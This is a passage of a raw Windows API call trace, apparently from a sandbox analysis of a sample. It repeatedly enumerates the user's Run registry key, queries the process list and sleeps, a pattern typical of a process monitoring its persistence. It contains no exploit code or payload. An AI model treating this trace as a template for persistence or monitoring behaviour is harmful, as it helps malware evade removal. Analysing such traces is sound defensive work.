KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.148] NtClose (Handle=0x154) returned 0x0 [0181.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.163] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.164] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.164] NtClose (Handle=0x154) returned 0x0 [0181.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.169] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.179] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.179] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.179] NtClose (Handle=0x154) returned 0x0 [0181.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.183] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.195] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.195] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.195] NtClose (Handle=0x154) returned 0x0 [0181.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.226] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.226] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.226] NtClose (Handle=0x154) returned 0x0 [0181.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.243] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.243] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.243] NtClose (Handle=0x154) returned 0x0 [0181.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.247] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.257] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.257] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.257] NtClose (Handle=0x154) returned 0x0 [0181.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.261] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.272] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.273] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.273] NtClose (Handle=0x154) returned 0x0 [0181.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.281] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.288] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.288] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.288] NtClose (Handle=0x154) returned 0x0 [0181.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.292] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.304] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.304] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.304] NtClose (Handle=0x154) returned 0x0 [0181.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.308] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.319] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.319] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.319] NtClose (Handle=0x154) returned 0x0 [0181.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.324] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.335] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.335] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.335] NtClose (Handle=0x154) returned 0x0 [0181.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.339] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.350] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.350] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.350] NtClose (Handle=0x154) returned 0x0 [0181.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.354] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.366] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.366] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.366] NtClose (Handle=0x154) returned 0x0 [0181.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, 